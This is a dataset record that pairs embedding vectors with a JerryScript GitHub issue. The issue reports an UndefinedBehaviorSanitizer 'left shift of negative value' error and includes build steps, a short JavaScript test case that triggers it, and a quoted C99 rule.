0.009200459346175194, 0.005259441677480936, 0.020538903772830963, -0.00345462653785944, 0.004372178111225367, -0.004575286526232958, 0.001546475337818265, -0.002722366712987423, -0.03061593696475029, -0.01647673361003399, 0.021978478878736496, 0.0029878332279622555, -0.004920927342027426, -0.008865508250892162, 0.00659211864694953, 0.0025121315848082304, -0.000007794735211064108, 0.012892046011984348, -0.008872635662555695, 0.0047962116077542305, -0.023104485124349594, 0.011473849415779114, -0.017574232071638107, 0.013953911140561104, 0.00807445403188467, 0.021208805963397026, -0.007953302003443241, -0.0001165869616670534, -0.022605622187256813, 0.006356940139085054, 0.005099092610180378, -0.01132419053465128, 0.0062500410713255405, 0.009136320091784, 0.006403263192623854, 0.006962702609598637, -0.00956391729414463, -0.01111751887947321, -0.019241860136389732, 0.013540567830204964, -0.00036056217504665256, -0.0036167569924145937, 0.007208570837974548, -0.011480975896120071, 0.006392573472112417, -0.0021308576688170433, -0.03064444288611412, -0.007447312120348215, -0.00954966340214014, -0.0064068264327943325, 0.014174836687743664, 0.01848643831908703, -0.0055872658267617226, 0.0120012192055583, -0.0097705889493227, 0.006556485313922167, 0.01830114610493183, 0.0008480671676807106, -0.0036452633794397116, -0.009043673984706402, -0.004999320022761822, 0.005184612236917019, -0.00602198950946331, 0.024144969880580902, -0.034378789365291595, -0.002189652295783162, -0.008986661210656166, -0.048261433839797974, -0.029062334448099136, 0.007675364147871733, 0.011017746292054653, -0.019769228994846344, 0.0022912065032869577, -0.000819115259218961, -0.011495229788124561, -0.009556789882481098, -0.010675668716430664, 0.018058842048048973, 0.01848643831908703, -0.004892420955002308, 0.021123286336660385, -0.0021166044753044844, 0.014060811139643192, -0.0001227113971253857, -0.029247626662254333, -0.006577865220606327, 0.004008720628917217, -0.0063284337520599365, -0.007482945453375578, -0.01706111617386341, 0.004778394941240549, -0.031100546941161156, -0.007425932679325342, 0.017132380977272987, 0.018415171653032303, -0.0056478423066437244, -0.0025566730182617903, -0.009378625079989433, -0.0073617929592728615, 0.022163771092891693, -0.00013251049676910043, -0.014003797434270382, 0.02606915682554245, -0.027964835986495018, 0.024487048387527466, 0.010882340371608734, -0.01318423729389906, -0.021721921861171722, 0.022520102560520172, -0.017930561676621437, -0.006478092633187771, 0.01077544130384922, -0.022534355521202087, -0.013740113005042076, 0.016376961022615433, 0.0050634597428143024, -0.009015167132019997, -0.0010538481874391437, 0.002490751910954714, -0.001858264789916575, -0.023361042141914368, -0.01321274321526289, 0.03141411766409874, 0.017075369134545326, 0.024073705077171326, -0.010654289275407791, 0.02185020036995411, -0.002025740221142769, 0.03315301239490509, 0.010055653750896454, -0.004992193542420864, -0.0046073561534285545, -0.013540567830204964, -0.0008240148308686912, -0.003262207843363285, 0.00741167925298214, -0.020524650812149048, 0.017531471326947212, -0.020952247083187103, -0.025270976126194, -0.012941932305693626, -0.002629720838740468, 0.01579257845878601, -0.0008079799590632319, 0.021764680743217468, 0.005768994800746441, 0.005312891211360693, 0.006631314754486084, 0.0063177440315485, 0.007561338134109974, -0.01014117244631052, -0.00788203626871109, 0.009392878040671349, 0.014516914263367653, -0.03070145659148693, -0.027351947501301765, 0.006599245127290487, -0.028306912630796432, 0.0009968351805582643, -0.02243458293378353, -0.0013549475697800517, -0.012336170300841331, -0.003262207843363285, 0.002565581351518631, 0.020467637106776237, 0.011758914217352867, -0.0011750005651265383, 0.029988793656229973, 0.004913800861686468, 0.00009787960152607411, -0.032753922045230865, -0.006955576129257679, -0.011630634777247906, -0.0007420587353408337, 0.003663080045953393, -0.0059079634957015514, -0.0033370372839272022, -0.007789389695972204, -0.009905993938446045, 0.009357244707643986, -0.014039430767297745, 0.00600060960277915, -0.014531167224049568, -0.018172867596149445, -0.009841854684054852, -0.004083550069481134, 0.008452164940536022, -0.008587570860981941, -0.016733290627598763, 0.006567175500094891, -0.007896289229393005, -0.04130585864186287, -0.003582905512303114, -0.001233795192092657, 0.0035757787991315126, 0.006356940139085054, -0.028349673375487328, 0.01095360703766346, -0.018201373517513275, 0.009635183028876781, 0.0173319261521101, 0.01372586004436016, -0.003053754335269332, -0.007098108064383268, 0.002047120127826929, -0.010091286152601242, 0.011331317014992237, -0.008516304194927216, -0.001838666619732976, 0.014474154449999332, -0.0037343460135161877, 0.0026849519927054644, 0.02824990078806877, 0.005466113332659006, -0.0027865064330399036, 0.00909356027841568, 0.016904329881072044, -0.01241456251591444, 0.022776659578084946, 0.011309937573969364, -0.013590454123914242, 0.008566190488636494, -0.02356058731675148, 0.00529863778501749, 0.013982417993247509, -0.00016068288823589683, -0.007080291863530874, -0.0033495088573545218, -0.0032550813630223274, -0.002916567027568817, -0.0004100030637346208, 0.02364610694348812, 0.006624188274145126, 0.014680826105177402, 0.008423658087849617, 0.021921467036008835, 0.0013389127561822534, 0.018614716827869415, 0.014153456315398216, -0.012578475289046764, 0.011872939765453339, -0.00761835090816021, 0.01703260838985443, 0.00032270202063955367, -0.0007429496035911143, -0.007279837038367987, -0.016376961022615433, 0.00008969512418843806, -0.005900837015360594, -0.009884614497423172, -0.013554820790886879, -0.02036786451935768, 0.020111307501792908, -0.005733361467719078, 0.0004881731001660228, -0.016191668808460236, -0.0224060770124197, -0.011680521070957184, 0.007782263215631247, -0.010077033191919327, 0.006196591537445784, -0.011844433844089508, -0.012721006758511066, 0.0438714399933815, -0.0035900322254747152, -0.02571282535791397, 0.010447616688907146, -0.0179448164999485, -0.008523430675268173, 0.005266568157821894, -0.026297207921743393, -0.0040301005356013775, -0.010376350954174995, -0.0006253604078665376, -0.003930327948182821, -0.018172867596149445, 0.00253529311157763, -0.013141477480530739, 0.007768009789288044, 0.018272640183568, -0.03244034945964813, 0.0027651265263557434, -0.0006364957662299275, -0.0255987998098135, 0.013882645405828953, 0.014417141675949097, -0.011580748483538628, 0.017289167270064354, 0.019797734916210175, -0.010725555010139942, -0.022634128108620644, -0.00909356027841568, 0.005989919416606426, 0.0010850271210074425, -0.002057810081169009, -0.02480061911046505, -0.01242881640791893, -0.007194317411631346, -0.012264903634786606, -0.000011789536074502394, -0.0008453946793451905, -0.0010137609206140041, -0.03409372270107269, 0.013041704893112183, -0.015350728295743465, 0.03135710582137108, -0.007187190931290388, 0.010240945033729076, -0.035861123353242874, 0.006706144195050001, -0.018044589087367058, -0.0008983988664112985, -0.0017460206290706992, -0.04287371411919594, 0.006136015057563782, -0.01195845939218998, 0.003128583775833249, -0.001991888741031289, 0.0026368473190814257, -0.015165436081588268, -0.006941322702914476, 0.0061716483905911446, 0.024187730625271797, 0.010269451886415482, -0.004671495873481035, -0.01381850615143776, -0.0023945425637066364, 0.006631314754486084, 0.005230935290455818, -0.014552547596395016, -0.003834118600934744, -0.009164826013147831, 0.00032715615816414356, -0.006253604311496019, -0.021721921861171722, -0.0009522938635200262, -0.0035900322254747152, 0.00045432167826220393, 0.01788780279457569, -0.006870056502521038, -0.006905689835548401, 0.01204397901892662, -0.022577114403247833, 0.005441170185804367, -0.010248071514070034, 0.017046861350536346, 0.009827601723372936, -0.014246102422475815, -0.010875213891267776, -0.004610919859260321, -0.011994092725217342, 0.010034273378551006, -0.008359518833458424, 0.017517218366265297, 0.004226082470268011, -0.002412358997389674, -0.03454982861876488, -0.0015233139274641871, 0.006371193565428257, 0.02728068083524704, -0.002039993414655328, 0.002175399102270603, 0.0061467052437365055, 0.01014117244631052, -0.010119793005287647, -0.012243524193763733, 0.0010770095977932215, 0.012699627317488194, 0.035176970064640045, -0.004949433729052544, 0.012086738832294941, -0.007996061816811562, -0.00783927645534277, 0.0017780903726816177, 0.009720702655613422, 0.035861123353242874, 0.0005870548775419593, -0.014559674076735973, 0.0186004638671875, -0.022947698831558228, 0.025470521301031113, 0.0008155519608408213, -0.014809105545282364, -0.010262325406074524, 0.0024052325170487165, 0.017346180975437164, -0.00033361464738845825, 0.007782263215631247, -0.0028648991137742996, -0.011637762188911438, 0.0012970438692718744, 0.012742387130856514, -0.0032604262232780457, -0.011081885546445847, 0.013569074682891369, -0.0012311226455494761, -0.0002182525786338374, 0.005904400255531073, 0.016291441395878792, -0.010041399858891964, 0.02190721407532692, 0.01647673361003399, 0.020880980417132378, 0.0009273507166653872, 0.0008641020394861698, 0.0018155050929635763, -0.020937994122505188, -0.004799774847924709, -0.0036559533327817917, 0.0035258925054222345, -0.009863235056400299, 0.017616990953683853, 0.00934299174696207, 0.005940033122897148, 0.02471509948372841, -0.00452540023252368, 0.012557094916701317, -0.0129633117467165, -0.003794922260567546, 0.005259441677480936, 0.024130716919898987, 0.009364372119307518, 0.01603488251566887, 0.016519492492079735, -0.01346217468380928, -0.00702684186398983, -0.020766954869031906, -0.014573927037417889, 0.014167710207402706, -0.006955576129257679, -0.00028038775781169534, 0.015151183120906353, -0.005423353984951973, -0.006919942796230316, 0.02441578172147274, 0.0208097156137228, -0.012286284007132053, 0.022719647735357285, -0.0005630025407299399, -0.0022413202095776796, 0.003941018134355545, 0.0284636989235878, 0.008936774916946888, -0.004888857714831829, 0.012150878086686134, 0.000766111072152853, -0.022605622187256813, 0.004279532004147768, 0.02805035561323166, -0.005583702586591244, 0.0038519352674484253, -0.01034784410148859, -0.0022413202095776796, -0.021009260788559914, -0.004532526712864637, 0.02323276363313198, -0.001908151083625853, -0.021294323727488518, -0.006873619742691517, 0.002373162657022476, 0.016049135476350784, 0.0060112993232905865, 0.024544060230255127, -0.02810736745595932, 0.011937079951167107, 0.016277188435196877, -0.019184846431016922, 0.02474360540509224, 0.0061146351508796215, 0.006260730791836977, 0.01406793761998415, -0.002574489451944828, -0.006691891234368086, -0.005067022982984781, -0.008616076782345772, 0.005170358810573816, 0.008979534730315208, 0.03389417752623558, 0.011537989601492882, 0.002095224801450968, -0.00875148270279169, -0.01956968382000923, -0.008765735663473606, -0.0024551188107579947, 0.015849590301513672, -0.0036417001392692327, -0.0032782426569610834, -0.004368614871054888, 0.024943150579929352, 0.008102960884571075, -0.014623813331127167, 0.02565581351518631, 0.0104048578068614, -0.01984049566090107, 0.017175141721963882, -0.0078107696026563644, 0.010269451886415482, 0.01204397901892662, -0.00005951836647000164, 0.03058743104338646, 0.004610919859260321, -0.016704784706234932, 0.022591369226574898, 0.0015500386944040656, 0.01443852111697197, 0.011509482748806477, 0.009114939719438553, 0.008837002329528332, -0.010583022609353065, -0.01202972512692213, 0.010305085219442844, 0.008388025686144829, -0.026910096406936646, 0.01262123417109251, -0.009164826013147831, -0.008951027877628803, -0.005074149463325739, -0.005997046362608671, -0.006150268483906984, 0.008922521956264973, -0.018001828342676163, -0.031129052862524986, 0.012329043820500374, -0.0029824881348758936, 0.025812597945332527, -0.0050634597428143024, -0.0056834751740098, 0.014880371280014515, -0.01158787589520216, 0.004311602097004652, -0.01091084722429514, 0.009535410441458225, -0.024629579856991768, 0.0015028248308226466, -0.02904808148741722, -0.010974986478686333, 0.02810736745595932, 0.0019010244868695736, -0.003855498507618904, 0.007319033145904541, 0.006014862563461065, -0.012093865312635899, -0.001917059300467372, -0.004329418297857046, -0.00003744256537174806, 0.007490071933716536, -0.0128706656396389, 0.006745340768247843, -0.010711302049458027, -0.008373771794140339, 0.0010618655942380428, -0.025826850906014442, -0.005583702586591244, -0.01034784410148859, -0.009043673984706402, 0.010768314823508263, 0.0022822984028607607, -0.012507208622992039, -0.005209555383771658, -0.0037842323072254658, 0.012072484940290451, -0.025470521301031113, 0.013697353191673756, 0.00400159414857626, -0.015393488109111786, 0.005968539975583553, -0.03557606041431427, 0.005056333262473345, -0.0070945448242127895, -0.003178470069542527, -0.016733290627598763, -0.020709943026304245, -0.00997726060450077, 0.0033887051977217197, -0.014060811139643192, 0.002396324183791876, 0.018001828342676163, -0.0038269921205937862, -0.02078120782971382, -0.0020382117945700884, 0.017973322421312332, 0.007511451840400696, 0.0028738074470311403, 0.004033663775771856, -0.02022533304989338, 0.009122067131102085, 0.018315399065613747, -0.0020489017479121685, 0.027594251558184624, 0.007108798250555992, 0.024928897619247437, 0.02450130134820938, 0.025442013517022133, 0.012136625126004219, 0.00030510820215567946, -0.00741167925298214, 0.0023143680300563574, 0.01641971990466118, 0.0065172892063856125, -0.012393183074891567, 0.006260730791836977, -0.0005634479457512498, -0.011687648482620716, -0.0201968252658844, -0.005687038414180279, -0.012136625126004219, -0.005943596828728914, -0.023161496967077255, 0.015421994030475616, 0.000835595594253391, 0.028862789273262024, 0.011459596455097198, -0.005619335453957319, -0.004215392749756575, 0.01813010685145855, 0.010226692073047161, 0.009236092679202557, -0.010632908903062344, -0.0020827532280236483, -0.0033726703841239214, -0.0011874721385538578, -0.007589844521135092, -0.012243524193763733, -0.000057848068536259234, -0.01059727557003498, -0.0047178189270198345, 0.011039125733077526, -0.01523670181632042, -0.011723280884325504, 0.0013745458563789725, 0.00006397250399459153, 0.003958834335207939, 0.027480226010084152, 0.012443069368600845, 0.01036209799349308, 0.004407810978591442, -0.01650523953139782, 0.0004518719215411693, 0.006827296689152718, -0.022448835894465446, -0.006014862563461065, 0.006289237644523382, -0.026054903864860535, 0.0010511756408959627, -0.006118198856711388, -0.0039018215611577034, -0.011260051280260086, 0.00820985995233059, -0.013547694310545921, -0.01626293547451496, -0.007297653239220381, -0.0051917387172579765, 0.015621539205312729, 0.026682045310735703, 0.003345945617184043, 0.003855498507618904, -0.025256723165512085, 0.017959069460630417, -0.0031713435892015696, 0.0039338911883533, -0.016248680651187897, 0.00905080046504736, 0.00404435396194458, 0.014345875009894371, 0.005494619719684124, -0.01091084722429514, 0.002665353938937187, -0.0018083784962072968, 0.02672480419278145, -0.002006141934543848, 0.028264153748750687, -0.004710692446678877, -0.010468997061252594, 0.006182338111102581, 0.01011266652494669, 0.002921912120655179, 0.020453384146094322, 0.004974376875907183, 0.017289167270064354, 0.006446023005992174, -0.008138594217598438, 0.00018963476759381592, 0.01061152946203947, -0.012314789928495884, 0.03794209659099579, 0.003413648344576359, 0.0044006844982504845, 0.012015472166240215, 0.017731016501784325, -0.003691586432978511, 0.01237180270254612, 0.013013198040425777, 0.00171573250554502, -0.011787421070039272, -0.007718123495578766, 0.011174531653523445, 0.0038768784143030643, -0.011929952539503574, -0.019826242700219154, 0.005184612236917019, -0.004151253029704094, 0.018814262002706528, 0.009827601723372936, 0.0211375392973423, -0.01644822582602501, 0.004404247738420963, -0.010640035383403301, 0.0062500410713255405, 0.01241456251591444, -0.016405466943979263, 0.020097052678465843, 0.026197435334324837, 0.020296597853302956, -0.01788780279457569, -0.01945565827190876, 0.015350728295743465, 0.005708418320864439, -0.0002750427811406553, -0.015079916454851627, -0.0035526175051927567, -0.0055373795330524445, 0.008829875849187374, 0.018614716827869415, -0.020439131185412407, -0.005630025640130043, 0.0007531940937042236, -0.007165811024606228, 0.006203718017786741, 0.02364610694348812, 0.008701596409082413, 0.009421384893357754, -0.02229205146431923, 0.017788030207157135, -0.00021903205197304487, -0.0019384392071515322, 0.009022294543683529, -0.0032889326103031635, -0.013626087456941605, 0.026240196079015732, 0.006652694661170244, 0.015721311792731285, 0.0271951612085104, 0.0028363927267491817, 0.0034777880646288395, 0.015193942002952099, 0.0014030522434040904, -0.008658836595714092, 0.01409644354134798, 0.014516914263367653, 0.00843078549951315, 0.016733290627598763, 0.022719647735357285, -0.006805916782468557, 0.014153456315398216, 0.004988630302250385, 0.01111751887947321, 0.0006155613227747381, 0.0014520477270707488, -0.01664777100086212, -0.0032835877500474453, -0.0005358323687687516, 0.015564526431262493, -0.009250345639884472, -0.017930561676621437, -0.001997233834117651, -0.013654593378305435, 0.008594697341322899, 0.02601214312016964, 0.014723585918545723, 0.015464753843843937, -0.021622149273753166, -0.012058231979608536, 0.019683709368109703, -0.020439131185412407, 0.03229781612753868, 0.0015402395511046052, 0.003884004894644022, -0.0035009493585675955, 0.0002043334097834304, 0.005608645733445883, 0.014880371280014515, -0.015721311792731285, -0.0031909416429698467, -0.012279157526791096, 0.007625477854162455, -0.006046932656317949, -0.022805167362093925, -0.003445718204602599, -0.02769402414560318, -0.008516304194927216, -0.004724945407360792, 0.00975633505731821, -0.006948449183255434, -0.00997726060450077, -0.0035668706987053156, -0.009863235056400299, -0.010297957807779312, 0.004112056456506252, -0.023047471418976784, -0.0057511781342327595, 0.005152542609721422, -0.0012596291489899158, -0.013583327643573284, -0.026411233469843864, -0.01409644354134798, 0.01532222144305706, 0.03055892325937748, -0.029532691463828087, -0.008224112913012505, -0.00445769727230072, -0.016690531745553017, -0.012393183074891567, -0.0063284337520599365, 0.003794922260567546, 0.012671120464801788, -0.04233209043741226, 0.004439881071448326, -0.005630025640130043, -0.020396370440721512, -0.0049316175282001495, 0.02964671701192856, -0.0012863539159297943, -0.016547998413443565, -0.0052451882511377335, 0.01031933818012476, 0.016818810254335403, 0.004037227015942335, -0.001019996707327664, 0.017616990953683853, -0.009214712306857109, 0.015692805871367455, 0.003816302167251706, -0.0036702065262943506, 0.013932531699538231, 0.010925100184977055, 0.011830179952085018, 0.005605082493275404, 0.004585976712405682, -0.010640035383403301, 0.01815861463546753, 0.00545542361214757, -0.002150455955415964, -0.010782567784190178, 0.004557469859719276, -0.0021326395217329264, -0.0017593830125406384, -0.007418805733323097, 0.009920247830450535, -0.011017746292054653, -0.0021166044753044844, 0.002743746619671583, 0.016704784706234932, 0.010561643168330193, -0.03206976503133774, 0.0015393487410619855, -0.001588344224728644, -0.010048526339232922, -0.00256914459168911, -0.007080291863530874, -0.02309023216366768, -0.012485829181969166, 0.016633518040180206, -0.00011118632392026484, 0.005918653681874275, -0.018914034590125084, 0.019384391605854034, 0.0018796445801854134, -0.0037592891603708267, 0.0006975174183025956, 0.014153456315398216, 0.02116604521870613, -0.0166762787848711, 0.005736924707889557, -0.031984247267246246, 0.009449890814721584, 0.005861640442162752, -0.021066272631287575, -0.004194012843072414, 0.0044790771789848804, -0.021593643352389336, -0.011031999252736568, -0.02471509948372841, -0.014723585918545723, 0.031243078410625458, -0.03896832838654518, -0.019640950486063957, 0.01430311519652605, -0.0032301379833370447, 0.004136999603360891, 0.015037156641483307, 0.004903110675513744, 0.00529863778501749, -0.00791054219007492, -0.008530558086931705, 0.009692195802927017, -0.00927172601222992, -0.030958013609051704, -0.024957405403256416, -0.006310617085546255, 0.005858077201992273, 0.008423658087849617, 0.0496012382209301, 0.012728134170174599, 0.012970438227057457, 0.021180298179388046, 0.01132419053465128, -0.009528283961117268, 0.00026257120771333575, -0.01431736908853054, -0.00989174097776413, -0.00518104899674654, -0.019441405311226845, 0.008580444380640984, 0.010768314823508263, -0.02267688699066639, 0.001604379154741764, 0.007589844521135092, 0.021793188527226448, -0.0008039711974561214, -0.023432308807969093, -0.015151183120906353, -0.003251517890021205, -0.01620592176914215, 0.0016792085953056812, -0.009122067131102085, 0.009635183028876781, 0.018757250159978867, -0.020068546757102013, -0.0021183860953897238, 0.015849590301513672, -0.013312515802681446, 0.030843988060951233, -0.006581428460776806, 0.020595915615558624, 0.008551937527954578, 0.005305764731019735, 0.023018965497612953, -0.02155088260769844, 0.021707668900489807, -0.013797125779092312, -0.01402517780661583, 0.01302032545208931, 0.009371498599648476, -0.025071430951356888, -0.017317673191428185, 0.012991818599402905, 0.0026065593119710684, 0.015892351046204567, -0.007931922562420368, 0.00006207949627423659, -0.01656225323677063, -0.002460463671013713, 0.014367255382239819, -0.0006369411712512374, 0.003142836969345808, 0.020410625264048576, -0.02119455114006996, 0.013341022655367851, -0.002643974032253027, 0.001161638181656599, 0.0019152776803821325, 0.004903110675513744, -0.018842769786715508, -0.00931448582559824, 0.023346789181232452, -0.013219870626926422, 0.022306304425001144, 0.015664299950003624, 0.007589844521135092, -0.0009567480301484466, 0.002626157598569989, 0.008943901397287846, 0.0038127389270812273, -0.013540567830204964, -0.006392573472112417, -0.004144126549363136, -0.01768825761973858, 0.013718733564019203, -0.00952115748077631, -0.027594251558184624, 0.008779989555478096, -0.015407741069793701, 0.0013700916897505522, -0.002971798414364457, 0.01140971016138792, 0.00315887201577425, -0.014588179998099804, 0.0011607473716139793, 0.016433972865343094, -0.0049779401160776615, 0.023745879530906677, -0.008530558086931705, 0.0032746794167906046, -0.008302506059408188, 0.010176805779337883, -0.005815317388623953, -0.0027508733328431845, 0.0004636753583326936, 0.01617741584777832, 0.007996061816811562, 0.010932226665318012, -0.008951027877628803, 0.0026475372724235058, -0.003162435255944729, -0.01266399398446083, -0.015992123633623123, -0.025527533143758774, -0.02901957556605339, -0.015136929228901863, -0.009186206385493279, -0.0052772583439946175, -0.0006819279515184462, 0.015094169415533543, -0.021764680743217468, 0.0006850458448752761, 0.011181658133864403, -0.0019117144402116537, -0.0017985793529078364, 0.001487680827267468, 0.02521396242082119, 0.009008040651679039, 0.0015634010778740048, 0.00808870792388916, 0.025427760556340218, 0.012008345685899258, -0.0019901071209460497, -0.0010520664509385824, 0.015635792165994644, 0.0166762787848711, -0.0006151159177534282, 0.010205312632024288, 0.0018903345335274935, -0.015536019578576088, 0.008958154357969761, 0.030131326988339424, 0.006360503379255533, 0.025784092023968697, 0.0018796445801854134, 0.01430311519652605, 0.00952115748077631, -0.015593033283948898, -0.03985203057527542, 0.02639698050916195, 0.005067022982984781, 0.001030686660669744, 0.0009825819870457053, 0.009164826013147831, -0.019826242700219154, -0.009186206385493279, 0.006100382190197706, -0.012535715475678444, 0.011580748483538628, 0.002624375745654106, 0.018172867596149445, 0.004500457085669041, -0.000607098510954529, 0.001451156917028129, -0.0004721382283605635, 0.008302506059408188, -0.025527533143758774, 0.007383172865957022, -0.014780598692595959, -0.012856412678956985, 0.000991490320302546, 0.028748763725161552, 0.0039517078548669815, 0.006014862563461065, 0.009663689881563187, -0.007319033145904541, 0.011295684613287449, -0.010632908903062344, -0.006032679229974747, -0.011017746292054653, 0.000034241154935443774, -0.013761493377387524, 0.023546334356069565, 0.006631314754486084, 0.01081820111721754, 0.003816302167251706, 0.005209555383771658, -0.006346250418573618, -0.0018956795101985335, 0.0057191080413758755, -0.01641971990466118, 0.0040051573887467384, 0.008573317900300026, -0.00870872288942337, -0.013483555056154728, 0.009620930068194866, 0.010768314823508263, -0.009293105453252792, -0.015692805871367455, -0.015307968482375145, -0.013718733564019203, -0.014003797434270382, -0.013775746338069439, 0.023346789181232452, 0.01567855291068554, -0.0016061607748270035, 0.019270366057753563, -0.00663487846031785, 0.003370888764038682, -0.02303321845829487, -0.01576407253742218, 0.014217596501111984 ]
1,679
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
<!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript function f() { var x = (("-1.234" << 0)); var y = 3.14; assertEq(true && x < y, true); } f(); ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/vm/opcodes-ecma-bitwise.c:96:70: runtime error: left shift of negative value -1 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.5.7/4): > The result of E1 << E2 is E1 left-shifted E2 bit positions; vacated bits are filled with zeros. If E1 has an unsigned type, the value of the result is E1 × 2 E2 , reduced modulo one more than the maximum value representable in the result type. If E1 has a signed type and nonnegative value, and E1 × 2 E2 is representable in the result type, then that is the resulting value; otherwise, the behavior is undefined.
ubsan: jerryscript/jerry-core/vm/opcodes-ecma-bitwise.c:96:70: runtime error: left shift of negative value -1
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4701/comments
0
2021-06-30T09:06:48
2022-01-20T13:00:47Z
https://github.com/jerryscript-project/jerryscript/issues/4701
933,471,606
4,701
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : ubsan: jerryscript/jerry-core/vm/opcodes-ecma-bitwise.c:96:70: runtime error: left shift of negative value -1 Issue date: --- start body --- <!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript function f() { var x = (("-1.234" << 0)); var y = 3.14; assertEq(true && x < y, true); } f(); ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/vm/opcodes-ecma-bitwise.c:96:70: runtime error: left shift of negative value -1 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.5.7/4): > The result of E1 << E2 is E1 left-shifted E2 bit positions; vacated bits are filled with zeros. If E1 has an unsigned type, the value of the result is E1 × 2 E2 , reduced modulo one more than the maximum value representable in the result type. If E1 has a signed type and nonnegative value, and E1 × 2 E2 is representable in the result type, then that is the resulting value; otherwise, the behavior is undefined. --- end body ---
4,106
[ -0.00856280792504549, -0.015896504744887352, 0.001277763512916863, -0.012762271799147129, 0.03203883394598961, 0.01171752717345953, 0.006708899047225714, 0.04077918082475662, -0.04345590993762016, 0.01806793548166752, -0.02268393151462078, 0.01119174063205719, -0.008228217251598835, 0.023762816563248634, -0.0009969457751139998, 0.031055543571710587, -0.04427531734108925, 0.02381744422018528, -0.03976857662200928, -0.0061079999431967735, 0.012304768897593021, 0.020130110904574394, -0.005257864948362112, 0.04662428796291351, -0.047115929424762726, 0.015377547591924667, 0.005271521396934986, 0.007565862499177456, -0.010891291312873363, -0.044439200311899185, 0.0032178815454244614, 0.013369998894631863, -0.027040448039770126, 0.0021407019812613726, 0.03070046752691269, -0.0043770018965005875, 0.028570007532835007, 0.03684602305293083, -0.04140739142894745, 0.009163707494735718, -0.029525984078645706, -0.04020559415221214, -0.016565687954425812, 0.051704611629247665, 0.013315372169017792, 0.046924736350774765, 0.017726516351103783, -0.009102251380681992, -0.030918976292014122, 0.011260024271905422, 